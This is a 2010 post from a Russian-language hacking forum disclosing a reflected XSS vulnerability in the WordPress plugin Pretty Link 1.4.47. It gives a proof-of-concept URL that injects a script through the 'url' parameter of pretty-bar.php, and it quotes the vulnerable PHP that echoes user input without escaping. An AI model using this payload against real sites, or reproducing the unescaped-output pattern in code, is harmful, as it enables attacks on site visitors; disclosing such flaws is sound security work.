16.05.2010, 15:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Pretty Link Version: 1.4.47
скачать
Пасивная XSS
http://[host]/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=<script>alert(123)</script>
уязвимый скрипт: wp-content/plugins/pretty-link/pretty-bar.php
PHP код:
/*...*/
$target_url = $_GET['url'];
$shortened_title = stripslashes(substr($prli_blogname,0,$bar_title_limit));
$shortened_desc = stripslashes(substr($prli_blogdescription,0,$bar_desc_limit));
$shortened_link = stripslashes(substr($target_url,0,$bar_link_limit));
if(strlen($prli_blogname) > $bar_title_limit)
$shortened_title .= "...";
if(strlen($prli_blogdescription) > $bar_desc_limit)
$shortened_desc .= "...";
if(strlen($target_url) > $bar_link_limit)
$shortened_link .= "...";
/*...*/
/*...*/
<?php if( $bar_show_target_url_link ) { ?>
<a href="<?php echo $target_url; ?>" title="You're viewing: <?php echo $target_url; ?>" target="_top">Viewing: <?php echo $shortened_link; ?></a>
<?php } else echo " "; ?>
/*...*/
Результат: http://[host]/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=<script>alert(123)</script>
|
|
|